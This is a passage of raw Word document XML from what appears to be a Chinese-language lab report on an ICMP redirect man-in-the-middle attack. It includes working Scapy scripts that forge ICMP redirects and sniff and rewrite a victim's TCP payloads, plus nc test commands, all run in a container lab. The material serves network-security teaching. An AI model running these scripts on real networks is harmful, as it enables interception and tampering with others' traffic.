            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>位置：HOST</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="251C9A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4915EB91">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D264D5E">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>关闭路由：- net.ipv4.ip_forward=0，重启容器。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3662F1D5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在victim中保持ping通：ping 192.168.60.5 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55BB4FE0">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改icmp.py：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625979DA">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>#!/usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA48653">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BC1E7BB">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E3D902">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08090709">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip = IP(src = '10.9.0.11', dst = '10.9.0.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5F878F">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp = ICMP(type=5, code=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E067FE">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>icmp.gw = '10.9.0.111'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20025C75">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15A1BE89">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># The enclosed IP packet should be the one that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="791752ED">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t># triggers the redirect message.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED5410A">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ip2 = IP(src = '10.9.0.5', dst = '192.168.60.5')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC44AFE">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>send(ip/icmp/ip2/ICMP());</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD1A9A7">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在attacker中：icmp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56AF27CA">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编写mitm.py中：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316CC842">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354B61D8">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F57B74">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F8DDEC5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>print("LAUNCHING MITM ATTACK.........")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A7E5EF">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="542CEEC5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>def spoof_pkt(pkt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD0D973">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   newpkt = IP(bytes(pkt[IP]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19330179">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   del(newpkt.chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54CC39A0">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   del(newpkt[TCP].payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CB9195">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519CCE87">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07AC033D">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   if pkt[TCP].payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D04E7BD">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       data = pkt[TCP].payload.load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703B40C8">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       print("*** %s, length: %d" % (data, len(data)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C313411">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76A729F1">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       # Replace a pattern</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0601047B">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       newdata = data.replace(b'Fan', b'AAA')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="701594F5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="070076A4">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       send(newpkt/newdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D419F7">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   else: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF4EEE5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       send(newpkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757DC30C">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74B086DC">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">f = 'tcp and ether src 02:42:0a:09:00:05' </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DEFCFA0">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E384EC6">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在malicious-server 上运行：mitm.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29934092">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在host上启动：nc -lp 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9B23CD">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在victim上连接并发送：nc 192.168.60.5 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCF70C2">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察host和victim以及malicious-server的显示。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB29CC9">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改mitm.py：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2385CD83">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F29EAB0">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="661D4271">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B8AE775">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>print("LAUNCHING MITM ATTACK.........")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADE3763">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69FFC088">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>def spoof_pkt(pkt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138A0D15">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   newpkt = IP(bytes(pkt[IP]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322492C8">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   del(newpkt.chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="401FC651">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   del(newpkt[TCP].payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E07EC17">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F8FFF4">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B80060F">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   if pkt[TCP].payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59756628">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       data = pkt[TCP].payload.load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DCFE47">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       print("*** %s, length: %d" % (data, len(data)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441392EE">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DF88396">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       # Replace a pattern</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DCE424">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       newdata = data.replace(b'Fan', b'AAA')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1228F9F8">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="490A5E1C">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       send(newpkt/newdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC93FCD">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   else: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CA156F8">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">       send(newpkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7492241C">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="258032F8">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">f = 'tcp and src host 10.9.0.5' </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739476F5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360" w:firstLine="210" w:firstLineChars="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20CEF9FD">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>11.在malicious-server 上运行：mitm.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F5931B5">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>12在host上启动：nc -lp 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD4BB94">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>13.在victim上连接并发送：nc 192.168.60.5 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B916D58">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>14.观察host和victim以及malicious-server的显示。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2CF91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15C86722">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="295DC121">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5052695" cy="899160"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="985591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1063" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5060280" cy="901054"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="26BF2EEE">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4993640" cy="2390775"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="1645828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28818" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4996063" cy="2392167"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3047973B">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5045710" cy="1866900"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1498902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2061" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
